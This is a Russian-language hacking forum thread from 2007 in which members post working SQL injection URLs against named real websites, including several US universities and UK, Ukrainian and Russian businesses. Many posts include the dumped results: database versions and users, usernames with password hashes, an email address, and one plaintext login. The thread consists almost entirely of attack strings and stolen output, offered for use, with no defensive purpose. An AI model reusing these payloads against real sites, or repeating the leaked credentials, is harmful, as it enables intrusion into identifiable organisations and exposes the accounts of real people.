HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #4231  
Старый 29.12.2007, 01:29
ThreeD
Banned
Регистрация: 25.12.2006
Сообщений: 179
Провел на форуме:
2337678

Репутация: 354
По умолчанию

Цитата:
Сообщение от 159932  
ну я думал что он их пробил ... раз до мемберс дошёл ... и проверять не стал ...
Блин, представляете, все перебрал, а про admin забыл
Бывает иногда...
 
Ответить с цитированием

  #4232  
Старый 29.12.2007, 02:12
n0ne
Постоянный
Регистрация: 01.01.2007
Сообщений: 796
Провел на форуме:
2693408

Репутация: 861


По умолчанию

outertemple.com

Цитата:
http://www.outertemple.com/barristers.php?bid=-60+union+Select+1,2,3,4,5,6,7,8,9,concat_ws(0x3a,n ame,password),11,12,13,14,15,16,17,18,19,20,21,22, 23,24,25,26,27,28,29,30,31,32,33+from+ot_users/*
otc1@truth-int.positive-internet.com:tc1::5.0.32-Debian_7etch1
 
Ответить с цитированием

  #4233  
Старый 29.12.2007, 04:23
ThreeD
Banned
Регистрация: 25.12.2006
Сообщений: 179
Провел на форуме:
2337678

Репутация: 354
По умолчанию

www.firstfordrivers.co.uk

Цитата:
http://www.firstfordrivers.co.uk/job-seekers/view-job.php?id=-8+union+select+1,2,3,4,concat(username,0x3a,pass,0 x3a,id),6,7,8,9,10,11,12,13,14,15+from+users+limit +0,1/*
5.0.24-standard-log:firstfordrivers_co_uk:first4drivers@localhost

sherry:586e56fa6ed25d6392861a85bccb45e6f64f8e86:10

Лимитом выводим остальных.
 
Ответить с цитированием

  #4234  
Старый 29.12.2007, 04:29
Ded MustD!e
Members of Antichat - Level 5
Регистрация: 23.08.2007
Сообщений: 417
Провел на форуме:
14324684

Репутация: 3908
По умолчанию

http://www.lunarenergy.co.uk/

Код:
http://www.lunarenergy.co.uk/newsDetail.php?id=-1+union+select+1,2,3,4,5,concat_ws(0x3a,convert(username+using+latin1),convert(password+using+latin1)),7+from+admin/*
scadesign:scadoo

http://www.warrenpointharbour.co.uk/

Код:
http://www.warrenpointharbour.co.uk/general.php?id=-1+union+select+1,2,3,4,convert(version()   +using+latin1),6,7,8,9,10,11/*
http://www.graysofwestminster.co.uk/

Код:
http://www.graysofwestminster.co.uk/newsitem.php?id=-1+union+select+1,convert(version()+usi   ng+latin1),3,4,5,6/*
http://www.newrowfarmnurseries.co.uk/

Код:
http://www.newrowfarmnurseries.co.uk/show_item.php?id=-1'+union+select+1,2,concat_ws(0x3   a,user(),version(),database()),4,5,6,7,8,9,10,11,12,13,14,15,16,17/*
http://www.inova.unicamp.br/

Код:
http://www.inova.unicamp.br/inovanosmunicipios/artigos_detail.php?id=-1+union+select+1,conca   t_ws(0x3a,user(),version(),database()),3,4,5,6/*
 
Ответить с цитированием

  #4235  
Старый 29.12.2007, 09:34
Scipio
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
Провел на форуме:
5939734

Репутация: 1917


Отправить сообщение для Scipio с помощью ICQ
По умолчанию

Какая то непонятная украинская CMS`ка FreshKnowledge

сайт CMS`ки:_http://www.freshknowledge.net/
сайт разработчика:_http://www.setlab.net/
уязвим форум, наверное там полно скулей, но копаться не стал, т.к. интереса особого не представляет

Код:
http://www.setlab.net/forum/?action=view_subject&subject_id=-6+union+select+1,user(),version(),4,5,6,7,8,9,10/*
еще примеры:
Код:
http://www.future.com.ua/forum/?action=view_subject&subject_id=-6+union+select+1,user(),version(),4,5,6,7,8,9,10/*
Код:
http://youth.livinggod.org.ua/forum/?action=view_subject&subject_id=-6+union+select+1,user(),version(),4,5,6,7,8,9,10/*
Код:
http://streetball.future.com.ua/forum/?action=view_subject&subject_id=-6+union+select+1,user(),version(),4,5,6,7,8,9,10/*
__________________
Карфаген должен быть разрушен...
 
Ответить с цитированием

edu
  #4236  
Старый 29.12.2007, 12:19
Dr.Z3r0
Leaders of The World
Регистрация: 06.07.2007
Сообщений: 246
Провел на форуме:
2030482

Репутация: 1796
По умолчанию edu

Вот опять по edu прошолся, прошу любить и жаловать:

www.gatech.edu Georgia Institute of Technology
Код:
http://www.gatech.edu/calendar/event.php?id=-2210%20UNION%20SELECT%201,2,3,4,5,VERSION(),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32/*
5.0.37


www.history.msu.edu Department of History - Michigan State University
Код:
http://www.history.msu.edu/view_profile.php?id=-93%20UNION%20SELECT%201,2,AES_DECRYPT(AES_ENCRYPT(CONCAT_WS(0x203A20,VERSION(),USER(),DATABASE()),0x20),0x20),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31/*
4.1.11-Debian_4sarge7-log : dpthistory2@www.matrix.msu.edu : dpthistory2



www.montana.edu Montana State University
Код:
http://www.montana.edu/cpa/news/nwview.php?article=-5458%20UNION%20SELECT%201,VERSION(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24/*
4.0.17
__________________
Кто я?..
 
Ответить с цитированием

  #4237  
Старый 29.12.2007, 14:03
AkyHa_MaTaTa
Постоянный
Регистрация: 19.03.2007
Сообщений: 684
Провел на форуме:
3152874

Репутация: 1020


Отправить сообщение для AkyHa_MaTaTa с помощью ICQ
По умолчанию

вот еще одна едушка:
Код:
 http://idl63.ils.unc.edu/chirag/Health/showmetadata.php?video_id=-1+union+select+1,2,3,4,5,6,7,8,9,database(),user(),12,version(),14,15,16,17,18,19,20/*
 
Ответить с цитированием

  #4238  
Старый 29.12.2007, 15:57
SWAT
Участник форума
Регистрация: 14.12.2006
Сообщений: 211
Провел на форуме:
1541753

Репутация: 552
По умолчанию

Код:
  http://travel-tourthailand.com/hotel_detail.php?id=-1+union+select+1,2,VERSION(),4,5,6,7,8,9,10,11,12,13,14,15,16,17+from+member/*
Код:
http://www.adventureincostarica.com/zones.php?ID=-1+union+select+1,VERSION(),3/*
 
Ответить с цитированием

  #4239  
Старый 29.12.2007, 16:15
ElteRUS
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
Провел на форуме:
7215020

Репутация: 1423
По умолчанию

http://www.pyramid.spb.ru/content/news/default.asp?shmode=2&ids=1&ida=-1+or+1=@@version

Microsoft SQL Server 2000 - 8.00.760 (Intel X86) Dec 17 2002 14:22:05 Copyright (c) 1988-2003 Microsoft Corporation Enterprise Edition on Windows NT 5.2 (Build 3790: Service Pack 2)

--------------------------------------------------------------------------
http://www.rus7.org/index.php?p=news&newid=-1+union+select+1,2,3,4,5,6,7,concat_ws(0x2F,versio n(),database(),user())/*

4.0.27-max-log/utsport1_db01/utsport1_db01@v29.valuehost.ru

--------------------------------------------------------------------------
http://www.combi-spb.ru/?module=news&id=-1+union+select+1,2,concat_ws(0x2F,version(),databa se(),user()),4,5/*

4.0.26/u63709/u63709@10.10.11.193

--------------------------------------------------------------------------
echoperm.ru

http://www.echoperm.ru/article.php?id=-1+union+select+1,2,concat_ws(0x2F,version(),databa se(),user()),4,5,6/*&part_id=2&class=news

4.1.20-log/echotest/echotest@localhost


http://www.echoperm.ru/article.php?id=-1+union+select+1,2,concat_ws(0x2F,username,user_pa ssword,user_email),4,5,6+from+phpbb_users/*&part_id=2&class=news

логин/хеш/мейл сразу все
admin/f609688322a2811966aeb9aca67e2557/gufar@inbox.ru
 
Ответить с цитированием

  #4240  
Старый 29.12.2007, 17:29
SWAT
Участник форума
Регистрация: 14.12.2006
Сообщений: 211
Провел на форуме:
1541753

Репутация: 552
По умолчанию

Код:
http://www.silbersaiten.de/show_item.php?id=-111+union+select+1,2,concat(id,0x3a,name),4,5,6,7,8,9+from+content/*
Код:
http://www.visitloudoncounty.com/show_item.php?id=-26+union+select+1,2/*
Код:
http://www.gregsequipment.com/show_item.php?id=-61+union+select+1,2,3,4,5,6,7,8,9,10+from+INFORMATION_SCHEMA.TABLES/*
Код:
https://www.happyvalleyamishtraders.com/store/show_item.php?id=-116+union+select+1,2,3,4,VERSION(),6,7,8,9,10,11,12,13,14/*
Код:
http://moblog.co.uk/view.php?id=-77571+union+select+1,2,3,4,5,6,7,8,9,10,11,12,concat(username,0x3a,password),14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49+from+mob_users/*

Последний раз редактировалось SWAT; 29.12.2007 в 17:48..
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ